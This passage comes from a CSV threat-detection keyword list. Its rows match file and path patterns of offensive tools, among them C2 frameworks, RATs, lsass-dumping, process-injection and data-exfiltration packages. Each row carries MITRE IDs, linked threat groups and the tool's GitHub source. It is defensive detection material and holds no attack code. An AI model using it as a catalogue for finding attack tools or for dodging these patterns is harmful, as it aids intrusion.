Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","1531","425","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z","9704"
"*/pivotnacci.git*",".{0,1000}\/pivotnacci\.git.{0,1000}","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","Sandworm","C2","https://github.com/blackarrowsec/pivotnacci","1","1","N/A","N/A","9","10","697","114","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z","9705"
"*/pivotnaccilib*",".{0,1000}\/pivotnaccilib.{0,1000}","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","Sandworm","C2","https://github.com/blackarrowsec/pivotnacci","1","0","#linux","N/A","9","10","697","114","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z","9706"
"*/pixiewps --*",".{0,1000}\/pixiewps\s\-\-.{0,1000}","offensive_tool_keyword","RouterScan","a penetration testing tool to maliciously scan for and brute force routers - cameras and network-attached storage devices with web interfaces","T1110","TA0006 - TA0007","RouterScan","Conti","Credential Access","https://github.com/mustafashykh/router-scan","1","0","#linux","N/A","8","1","83","44","2019-02-24T14:31:16Z","2019-02-24T07:52:22Z","9707"
"*/pixiewps/archive/master.zip*",".{0,1000}\/pixiewps\/archive\/master\.zip.{0,1000}","offensive_tool_keyword","RouterScan","a penetration testing tool to maliciously scan for and brute force routers - cameras and network-attached storage devices with web interfaces","T1110","TA0006 - TA0007","RouterScan","Conti","Credential Access","https://github.com/mustafashykh/router-scan","1","1","N/A","N/A","8","1","83","44","2019-02-24T14:31:16Z","2019-02-24T07:52:22Z","9708"
"*/pjl-info-config.nse*",".{0,1000}\/pjl\-info\-config\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://github.com/nccgroup/nmap-nse-vulnerability-scripts","1","1","N/A","N/A","N/A","7","627","59","2022-03-04T09:08:55Z","2021-05-18T15:20:30Z","9709"
"*/pjl-ready-message.nse*",".{0,1000}\/pjl\-ready\-message\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9710"
"*/pkg/merlin.go*",".{0,1000}\/pkg\/merlin\.go.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","9711"
"*/PKINITtools*",".{0,1000}\/PKINITtools.{0,1000}","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550.003 - T1557.002 - T1552.004 - T1212 - T1550","TA0009 - TA0008","N/A","N/A","Lateral Movement","https://github.com/dirkjanm/PKINITtools","1","1","N/A","N/A","N/A","8","737","82","2025-01-03T14:25:52Z","2021-07-27T19:06:09Z","9712"
"*/Plasma RAT.exe*",".{0,1000}\/Plasma\sRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","9713"
"*/Plazmaz/LNKUp*",".{0,1000}\/Plazmaz\/LNKUp.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","9714"
"*/Plugins/HRDP.dll*",".{0,1000}\/Plugins\/HRDP\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","N/A","10","","N/A","","","","9715"
"*/Plugins/HVNC.dll*",".{0,1000}\/Plugins\/HVNC\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","N/A","10","","N/A","","","","9716"
"*/Plugins/PreventSleep.dll*",".{0,1000}\/Plugins\/PreventSleep\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","N/A","10","","N/A","","","","9717"
"*/pngZIP.ps1*",".{0,1000}\/pngZIP\.ps1.{0,1000}","offensive_tool_keyword","ShellSync","exposing a server with suspicious scripts and executable from I-Am-Jakoby","T1059.003 - T1100  - T1027","TA0005 - TA0009 - TA0011 ","N/A","N/A","Data Exfiltration","https://github.com/I-Am-Jakoby/ShellSync","1","0","#linux","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","9718"
"*/POC/driverdump/*",".{0,1000}\/POC\/driverdump\/.{0,1000}","offensive_tool_keyword","DriverDump","abusing the old process explorer driver to grab a privledged handle to lsass and then dump it","T1543 - T1548 - T1562 - T1003 - T1569","TA0005 - TA0003 - TA0004 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","9719"
"*/PoC/PrivilegeEscalation*",".{0,1000}\/PoC\/PrivilegeEscalation.{0,1000}","offensive_tool_keyword","echoac-poc","poc stealing the Kernel's KPROCESS/EPROCESS block and writing it to a newly spawned shell to elevate its privileges to the highest possible - nt authority\system","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/kite03/echoac-poc","1","1","N/A","N/A","8","2","138","25","2024-01-09T16:44:00Z","2023-06-28T00:52:22Z","9720"
"*/POC_DLL.vcxproj*",".{0,1000}\/POC_DLL\.vcxproj.{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","N/A","10","2","132","17","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z","9721"
"*/PoC-CVE-2023-21554*",".{0,1000}\/PoC\-CVE\-2023\-21554.{0,1000}","offensive_tool_keyword","poc","Windows Message Queuing vulnerability exploitation with custom payloads","T1192 - T1507","TA0002","N/A","N/A","Exploitation tool","https://github.com/Hashi0x/PoC-CVE-2023-21554","1","1","N/A","network exploitation tool","N/A","","N/A","","","","9722"
"*/poisoners/*.py",".{0,1000}\/poisoners\/.{0,1000}\.py","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","N/A","10","4656","1722","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z","9723"
"*/Poisoners-Session.log*",".{0,1000}\/Poisoners\-Session\.log.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","#linux","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","9724"
"*/polenum.py*",".{0,1000}\/polenum\.py.{0,1000}","offensive_tool_keyword","polenum","Uses Impacket Library to get the password policy from a windows machine","T1012 - T1596","TA0009 - TA0007","N/A","N/A","Discovery","https://salsa.debian.org/pkg-security-team/polenum","1","0","#linux","N/A","8","10","N/A","N/A","N/A","N/A","9725"
"*/PoolParty.cpp*",".{0,1000}\/PoolParty\.cpp.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","1","N/A","N/A","9","10","1088","143","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z","9726"
"*/PoolParty.exe*",".{0,1000}\/PoolParty\.exe.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","1","N/A","N/A","9","10","1088","143","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z","9727"
"*/PoolParty.git*",".{0,1000}\/PoolParty\.git.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","1","N/A","N/A","9","10","1088","143","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z","9728"
"*/PoolParty.hpp*",".{0,1000}\/PoolParty\.hpp.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","1","N/A","N/A","9","10","1088","143","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z","9729"
"*/PoolParty.sln*",".{0,1000}\/PoolParty\.sln.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","1","N/A","N/A","9","10","1088","143","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z","9730"
"*/PoolParty.vcxproj*",".{0,1000}\/PoolParty\.vcxproj.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","1","N/A","N/A","9","10","1088","143","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z","9731"
"*/PoolPartyBof.c*",".{0,1000}\/PoolPartyBof\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Defense Evasion","https://github.com/0xEr3bus/PoolPartyBof","1","0","N/A","N/A","9","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","9732"
"*/PoolPartyBof.git*",".{0,1000}\/PoolPartyBof\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Defense Evasion","https://github.com/0xEr3bus/PoolPartyBof","1","0","N/A","N/A","9","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","9733"
"*/PoolPartyBof.git*",".{0,1000}\/PoolPartyBof\.git.{0,1000}","offensive_tool_keyword","PoolPartyBof","A beacon object file implementation of PoolParty Process Injection Technique","T1055.011 - T1055 - T1620","TA0005","N/A","Black Basta","Privilege Escalation","https://github.com/0xEr3bus/PoolPartyBof","1","1","N/A","N/A","10","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","9734"
"*/PoolPartyBof.x64.o*",".{0,1000}\/PoolPartyBof\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Defense Evasion","https://github.com/0xEr3bus/PoolPartyBof","1","0","N/A","N/A","9","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","9735"
"*/PoolPartyBof/releases/download/*",".{0,1000}\/PoolPartyBof\/releases\/download\/.{0,1000}","offensive_tool_keyword","PoolPartyBof","A beacon object file implementation of PoolParty Process Injection Technique","T1055.011 - T1055 - T1620","TA0005","N/A","Black Basta","Privilege Escalation","https://github.com/0xEr3bus/PoolPartyBof","1","1","N/A","N/A","10","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","9736"
"*/PoolPartyBof/tarball/*",".{0,1000}\/PoolPartyBof\/tarball\/.{0,1000}","offensive_tool_keyword","PoolPartyBof","A beacon object file implementation of PoolParty Process Injection Technique","T1055.011 - T1055 - T1620","TA0005","N/A","Black Basta","Privilege Escalation","https://github.com/0xEr3bus/PoolPartyBof","1","1","N/A","N/A","10","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","9737"
"*/PoolPartyBof/zipball/*",".{0,1000}\/PoolPartyBof\/zipball\/.{0,1000}","offensive_tool_keyword","PoolPartyBof","A beacon object file implementation of PoolParty Process Injection Technique","T1055.011 - T1055 - T1620","TA0005","N/A","Black Basta","Privilege Escalation","https://github.com/0xEr3bus/PoolPartyBof","1","1","N/A","N/A","10","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","9738"
"*/pop_exfil_client.py*",".{0,1000}\/pop_exfil_client\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","1","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","9739"
"*/pop_exfil_server.py*",".{0,1000}\/pop_exfil_server\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","1","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","9740"
"*/pop3-brute.nse*",".{0,1000}\/pop3\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9741"
"*/pop3-capabilities.nse*",".{0,1000}\/pop3\-capabilities\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9742"
"*/pop3-ntlm-info.nse*",".{0,1000}\/pop3\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9743"
"*/popCalc.bin*",".{0,1000}\/popCalc\.bin.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. and PPID spoofing.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/spawn","1","1","N/A","N/A","10","10","455","73","2023-03-08T15:53:44Z","2021-07-17T16:35:59Z","9744"
"*/port_reuse.py*",".{0,1000}\/port_reuse\.py.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","1","N/A","N/A","10","10","2070","357","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z","9745"
"*/port_scan.py*",".{0,1000}\/port_scan\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","9746"
"*/PortBender/*",".{0,1000}\/PortBender\/.{0,1000}","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","N/A","10","10","712","111","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z","9747"
"*/portscan.cna*",".{0,1000}\/portscan\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","N/A","10","10","635","57","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z","9760"
"*/Portscan.exe*",".{0,1000}\/Portscan\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","9761"
"*/Portscan.exe*",".{0,1000}\/Portscan\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","9762"
"*/portscan.git*",".{0,1000}\/portscan\.git.{0,1000}","offensive_tool_keyword","portscan","A simple TCP and UDP portscanner written in Go","T1595 - T1596 - T1594","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/zs5460/portscan","1","1","N/A","N/A","N/A","1","14","4","2022-11-11T09:26:47Z","2019-06-04T09:00:00Z","9763"
"*/Port-Scan.ps1*",".{0,1000}\/Port\-Scan\.ps1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","9764"
